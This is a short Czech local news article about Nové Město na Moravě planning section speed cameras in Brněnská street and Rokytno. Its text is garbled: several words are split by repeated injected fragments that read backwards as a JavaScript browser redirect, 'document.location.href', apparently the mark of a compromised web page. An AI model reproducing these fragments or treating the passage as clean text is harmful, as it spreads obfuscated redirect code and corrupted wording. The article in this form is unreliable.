Rainbow page separator

Radary se záznamem mají ukáznit šoféry jedoucí příliš rychle

Středa, 2. června 2021

Nové Město na Moravě

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Ještě le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos hodlají v Novém Městě uvést do provozu úsekové měření rychlosti ve dvou místech. Radary s au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomatickým záznamem budou měřit rychlost aut v Brněnské ulici a v místní části města Rokytno. Aktuálně probíhá výběrové řízení za dodavatele technického zařízení, přičemž do budoucna je v plánu úsekové měření zavést i v jiných částech města.
K záměru se novoměstská radnice rozhodla přis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupit na základě četných stížností obyvatel na bezohlednou jízdu některých řidičů a také se zřetelem na dopravní nehody kvůli nepřiměřené rychlosti, k nimž již v lokalitách došlo. Právě úsekové měření s au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomatickým záznamem vyšlo jako nejoptimálnější způsob z výsledků analýzy možných omezujících opatření. Každé překročení povolené rychlosti bude mít za následek au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomatickou pokutu udělenou provinilému šoférovi. Na dalších místech se navíc počítá s rozmístěním upozorňujících stacionárních radarů.